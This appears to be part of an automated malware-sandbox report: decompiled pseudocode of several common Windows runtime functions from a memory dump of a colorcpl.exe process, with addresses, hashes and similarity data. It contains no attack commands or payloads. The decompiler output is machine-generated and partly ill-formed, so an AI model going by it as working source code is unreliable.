                                                                                                0x06edfeef
                                                                                                0x06edfe33
                                                                                                0x06edfe55
                                                                                                0x06edfe59
                                                                                                0x06edfe5b
                                                                                                0x06edfe5e
                                                                                                0x06edfe69
                                                                                                0x06edfe6d
                                                                                                0x06edfe6d
                                                                                                0x06edfe69
                                                                                                0x06edfe35
                                                                                                0x06edfe41
                                                                                                0x06edfe41
                                                                                                0x06edfe79
                                                                                                0x06edfe8b
                                                                                                0x06edfe7b
                                                                                                0x06edfe84
                                                                                                0x06edfe84
                                                                                                0x06edfe93
                                                                                                0x00000000
                                                                                                0x06edfea8
                                                                                                0x06edfeba
                                                                                                0x00000000
                                                                                                0x06edfeba
                                                                                                0x06edfdfe
                                                                                                0x06edfe01
                                                                                                0x06edfe02
                                                                                                0x06edfe08
                                                                                                0x06edff0c
                                                                                                0x06edff14
                                                                                                0x06edff14

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                • Instruction ID: 5fc497a32e6fc3e2bffa79cd4288363fff9d5f5d354f1b1ff621ea98b9ff4cc3
                                                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                • Instruction Fuzzy Hash: 3B310832B007446FD7A2DB68CC44F6A77AAEBC5664F186458EC478B381DA74DC43C750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EDEA55 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E06EDEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E06E32280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E06EDE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E06E1F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E06E2FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E06EDAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E06EDBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E06E37D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E06ECFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E06E2FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E06EDA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                0x06edea55
                                                                                                0x06edea66
                                                                                                0x06edea68
                                                                                                0x06edea6c
                                                                                                0x06edea6f
                                                                                                0x06edea72
                                                                                                0x06edea75
                                                                                                0x06edea7a
                                                                                                0x06edea7a
                                                                                                0x06edea7e
                                                                                                0x06edea80
                                                                                                0x06edea85
                                                                                                0x06edea8b
                                                                                                0x06edeab5
                                                                                                0x06edeabc
                                                                                                0x06edeabf
                                                                                                0x06edeabf
                                                                                                0x06edeaca
                                                                                                0x06edeace
                                                                                                0x06edead0
                                                                                                0x06edeae4
                                                                                                0x06edeaeb
                                                                                                0x06edeaf0
                                                                                                0x06edeaf5
                                                                                                0x06edeb09
                                                                                                0x06edeb0d
                                                                                                0x06edeb1d
                                                                                                0x06edeb2d
                                                                                                0x06edeb38
                                                                                                0x06edeb3d
                                                                                                0x06edeb41
                                                                                                0x06edeb4a
                                                                                                0x06edeb60
                                                                                                0x06edeb4c
                                                                                                0x06edeb52
                                                                                                0x06edeb59
                                                                                                0x06edeb59
                                                                                                0x06edeb68
                                                                                                0x06edeb71
                                                                                                0x06edeb71
                                                                                                0x06edea8d
                                                                                                0x06edea8f
                                                                                                0x06edea92
                                                                                                0x06edea97
                                                                                                0x06edea97
                                                                                                0x06edea9b
                                                                                                0x06edea9c
                                                                                                0x06edea9e
                                                                                                0x06edeaa6
                                                                                                0x06edeaa6
                                                                                                0x06edeb7e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                • Instruction ID: b7d1414ada098648364713a341b2a9c675c1d69cb1d3edceed2bc42e1255700a
                                                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                • Instruction Fuzzy Hash: 4F31C3726147059FC7A9DF24CC84A6BB7AAFBC4210F04592DF5668B684DE30E806CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E969A6 Relevance: .1, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E06E969A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x6f0d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L06E26C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E06E96BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E06E59980() >= 0) {
							E06E32280(_t56, 0x6f08778);
							_t77 = 1;
							_t68 = 1;
							if( *0x6f08774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x6f08774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E06E1B6F0(0x6dfc338, 0x6dfc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E06E59520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E06E595D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E06E2FFB0(_t68, _t77, 0x6f08778);
				}
				_pop(_t78);
				return E06E5B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                0x06e969b5
                                                                                                0x06e969be
                                                                                                0x06e969c3
                                                                                                0x06e969c9
                                                                                                0x06e969cc
                                                                                                0x06e969d1
                                                                                                0x06e969d3
                                                                                                0x06e969de
                                                                                                0x06e969e1
                                                                                                0x06e969ea
                                                                                                0x06e969f6
                                                                                                0x06e969fe
                                                                                                0x06e96a13
                                                                                                0x06e96a14
                                                                                                0x06e96a15
                                                                                                0x06e96a16
                                                                                                0x06e96a1e
                                                                                                0x06e96a26
                                                                                                0x06e96a31
                                                                                                0x06e96a36
                                                                                                0x06e96a37
                                                                                                0x06e96a40
                                                                                                0x06e96a49
                                                                                                0x06e96a4a
                                                                                                0x06e96a53
                                                                                                0x06e96a59
                                                                                                0x06e96a5d
                                                                                                0x06e96a5e
                                                                                                0x06e96a64
                                                                                                0x06e96a67
                                                                                                0x06e96a6a
                                                                                                0x06e96a6d
                                                                                                0x06e96a70
                                                                                                0x06e96a77
                                                                                                0x06e96a7d
                                                                                                0x06e96a86
                                                                                                0x06e96a89
                                                                                                0x06e96a9c
                                                                                                0x06e96a9f
                                                                                                0x06e96aa2
                                                                                                0x06e96aa5
                                                                                                0x06e96aaf
                                                                                                0x06e96ab1
                                                                                                0x06e96ab8
                                                                                                0x06e96ab9
                                                                                                0x06e96abb
                                                                                                0x06e96abe
                                                                                                0x06e96ac5
                                                                                                0x06e96ac5
                                                                                                0x06e96aaf
                                                                                                0x06e96a40
                                                                                                0x06e96a26
                                                                                                0x06e969fe
                                                                                                0x06e96ace
                                                                                                0x06e96ad0
                                                                                                0x06e96ad3
                                                                                                0x06e96ad8
                                                                                                0x06e96adf
                                                                                                0x06e96adf
                                                                                                0x06e96ae8
                                                                                                0x06e96aef
                                                                                                0x06e96aef
                                                                                                0x06e96af9
                                                                                                0x06e96b06

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2b4c52a51661f88437114aada53783b7b8cb29aacb4f80c2d332ae5bfceb9c17
                                                                                                • Instruction ID: 3fedf7a1ec7c735631cac1b684bf3b4ebe75d016967dd4391e0d0576ea8e484f
                                                                                                • Opcode Fuzzy Hash: 2b4c52a51661f88437114aada53783b7b8cb29aacb4f80c2d332ae5bfceb9c17
                                                                                                • Instruction Fuzzy Hash: 37417CB1D00318AFEBA4DFA5C940BFEBBF8EF48714F14912AE924A7250DB749905CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E15210 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E06E15210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E06E152A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E06E595D0();
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E06E2EB70(_t54, 0x6f079a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E06E595D0();
								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E06E2EB70(_t54, 0x6f079a0);
						}
						return _t52;
					}
					L5:
					_t33 = E06E5F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E06E2EB70(_t54, 0x6f079a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E06E595D0();
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                0x06e15220
                                                                                                0x06e15224
                                                                                                0x06e70d13
                                                                                                0x06e70d16
                                                                                                0x06e70d19
                                                                                                0x06e1522a
                                                                                                0x06e1522a
                                                                                                0x06e1522d
                                                                                                0x06e1522d
                                                                                                0x06e15231
                                                                                                0x06e15235
                                                                                                0x06e15239
                                                                                                0x06e70d5c
                                                                                                0x06e70d62
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e70d6a
                                                                                                0x06e70d7b
                                                                                                0x06e70d7f
                                                                                                0x06e70d81
                                                                                                0x06e70d84
                                                                                                0x06e70d95
                                                                                                0x06e70d95
                                                                                                0x06e70d6c
                                                                                                0x06e70d71
                                                                                                0x06e70d71
                                                                                                0x06e70d9a
                                                                                                0x00000000
                                                                                                0x06e1524a
                                                                                                0x06e1524a
                                                                                                0x06e15250
                                                                                                0x06e70d24
                                                                                                0x06e70d35
                                                                                                0x06e70d39
                                                                                                0x06e70d3b
                                                                                                0x06e70d3e
                                                                                                0x06e70d50
                                                                                                0x06e70d50
                                                                                                0x06e70d26
                                                                                                0x06e70d2b
                                                                                                0x06e70d2b
                                                                                                0x00000000
                                                                                                0x06e70d55
                                                                                                0x06e15256
                                                                                                0x06e1525b
                                                                                                0x06e15265
                                                                                                0x06e70da7
                                                                                                0x06e1526b
                                                                                                0x06e1526e
                                                                                                0x06e15272
                                                                                                0x06e70db1
                                                                                                0x06e70db4
                                                                                                0x06e70dc5
                                                                                                0x06e70dc5
                                                                                                0x06e15272
                                                                                                0x06e15278
                                                                                                0x06e1527e
                                                                                                0x06e1528a
                                                                                                0x06e1528c
                                                                                                0x06e1528d
                                                                                                0x00000000
                                                                                                0x06e15280
                                                                                                0x06e15282
                                                                                                0x06e15288
                                                                                                0x06e1529f
                                                                                                0x06e15292
                                                                                                0x00000000
                                                                                                0x06e15292
                                                                                                0x00000000
                                                                                                0x06e15288
                                                                                                0x06e1527e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7e486fc0a9e68acf38d052c53f83cef7ed35016fde870636aaa28db03464fb3f
                                                                                                • Instruction ID: aef42a8e8c3645941b96a900338a16a0396bf19a9353476e7668a42dd43e0f5d
                                                                                                • Opcode Fuzzy Hash: 7e486fc0a9e68acf38d052c53f83cef7ed35016fde870636aaa28db03464fb3f
                                                                                                • Instruction Fuzzy Hash: 7D3128B2651710EFD7F1AB18CC40BA677B9FF50760F116A19E9260B190E770F900DAD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E53D43 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E53D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E06E27B60(0, _t61, 0x6df11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E06E27B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L06E34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                0x06e53d4c
                                                                                                0x06e53d50
                                                                                                0x06e53d55
                                                                                                0x06e53d5e
                                                                                                0x06e8e79a
                                                                                                0x00000000
                                                                                                0x06e8e79a
                                                                                                0x06e53d68
                                                                                                0x06e8e789
                                                                                                0x06e53d9d
                                                                                                0x06e53da3
                                                                                                0x06e53daf
                                                                                                0x06e53db5
                                                                                                0x06e53dbc
                                                                                                0x06e53dc4
                                                                                                0x06e53dc9
                                                                                                0x06e53dce
                                                                                                0x06e8e7ae
                                                                                                0x06e8e7ae
                                                                                                0x06e53dde
                                                                                                0x06e53de2
                                                                                                0x06e53de7
                                                                                                0x06e53e0d
                                                                                                0x06e53e13
                                                                                                0x06e53e16
                                                                                                0x06e53e1e
                                                                                                0x06e53e25
                                                                                                0x06e53e28
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e53e2a
                                                                                                0x06e53e2f
                                                                                                0x06e53e37
                                                                                                0x06e53e37
                                                                                                0x00000000
                                                                                                0x06e53e37
                                                                                                0x06e53e31
                                                                                                0x00000000
                                                                                                0x06e53e31
                                                                                                0x06e53e20
                                                                                                0x06e53e20
                                                                                                0x06e53e35
                                                                                                0x00000000
                                                                                                0x06e53de9
                                                                                                0x06e53de9
                                                                                                0x06e53de9
                                                                                                0x06e53dee
                                                                                                0x06e53dfd
                                                                                                0x06e53dff
                                                                                                0x06e53e02
                                                                                                0x06e53e05
                                                                                                0x06e53e05
                                                                                                0x00000000
                                                                                                0x06e53df0
                                                                                                0x06e53de7
                                                                                                0x06e8e78f
                                                                                                0x06e8e794
                                                                                                0x06e53d79
                                                                                                0x06e53d84
                                                                                                0x06e53d89
                                                                                                0x06e53d8e
                                                                                                0x00000000
                                                                                                0x06e8e7a4
                                                                                                0x06e53d96
                                                                                                0x06e53d9a
                                                                                                0x00000000
                                                                                                0x06e53d9a
                                                                                                0x00000000
                                                                                                0x06e8e794
                                                                                                0x06e53d6e
                                                                                                0x06e53d73
                                                                                                0x00000000
                                                                                                0x06e8e7b5
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 017dd985c53338cbcfb6d2163af09c43c9082cea1af25867bbf8ebacd16cdb65
                                                                                                • Instruction ID: dc67e51c8b86e30917dbb43045d547c8976363b59f9e6e35ec88be3c0a1e48b6
                                                                                                • Opcode Fuzzy Hash: 017dd985c53338cbcfb6d2163af09c43c9082cea1af25867bbf8ebacd16cdb65
                                                                                                • Instruction Fuzzy Hash: DC31C235A05715DFD7A48F29C841A7BBBF5EF45784B06906AE849CB390FB30D840CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E97016 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E06E97016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x6f0d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E06E96B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E06E96B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E06E37D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E06E59AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E06E5B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L06E34620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                0x06e97016
                                                                                                0x06e9701e
                                                                                                0x06e9702b
                                                                                                0x06e97033
                                                                                                0x06e97037
                                                                                                0x06e9703c
                                                                                                0x06e9703e
                                                                                                0x06e97041
                                                                                                0x06e97045
                                                                                                0x06e9704a
                                                                                                0x06e97050
                                                                                                0x06e97055
                                                                                                0x06e9705a
                                                                                                0x06e97062
                                                                                                0x06e97062
                                                                                                0x06e9705a
                                                                                                0x06e97064
                                                                                                0x06e97064
                                                                                                0x06e97067
                                                                                                0x06e97071
                                                                                                0x06e97096
                                                                                                0x06e9709b
                                                                                                0x06e970a2
                                                                                                0x06e970a6
                                                                                                0x06e970a7
                                                                                                0x06e970ad
                                                                                                0x06e970b3
                                                                                                0x06e970b6
                                                                                                0x06e970bb
                                                                                                0x06e970c3
                                                                                                0x06e970c3
                                                                                                0x06e970c6
                                                                                                0x06e970cd
                                                                                                0x06e970dd
                                                                                                0x06e970e0
                                                                                                0x06e970e2
                                                                                                0x06e970e2
                                                                                                0x06e970ee
                                                                                                0x06e97101
                                                                                                0x06e970f0
                                                                                                0x06e970f9
                                                                                                0x06e970f9
                                                                                                0x06e9710a
                                                                                                0x06e9710e
                                                                                                0x06e97112
                                                                                                0x06e97117
                                                                                                0x06e97118
                                                                                                0x06e97118
                                                                                                0x06e970bb
                                                                                                0x06e9711d
                                                                                                0x06e97123
                                                                                                0x06e97131
                                                                                                0x06e97131
                                                                                                0x06e97136
                                                                                                0x06e9713d
                                                                                                0x06e9713e
                                                                                                0x06e9713f
                                                                                                0x06e9714a
                                                                                                0x06e9714a
                                                                                                0x06e97084
                                                                                                0x06e97088
                                                                                                0x00000000
                                                                                                0x06e9708e
                                                                                                0x06e9708e
                                                                                                0x06e97092
                                                                                                0x00000000
                                                                                                0x06e97092

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4d0a2f9ee42de2aceac0bbdd0ab5747f298f6c49ed3cdfeb1d22ec88f1f89f3
                                                                                                • Instruction ID: b40597e17bbd3561f2a98c0a2eb28a2f06411afa9df808a37a5751ffde807795
                                                                                                • Opcode Fuzzy Hash: e4d0a2f9ee42de2aceac0bbdd0ab5747f298f6c49ed3cdfeb1d22ec88f1f89f3
                                                                                                • Instruction Fuzzy Hash: 2331B372A147519BCB64DF28CC50A6AB3E9BF89600F044A29F8A587790E731E908C7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

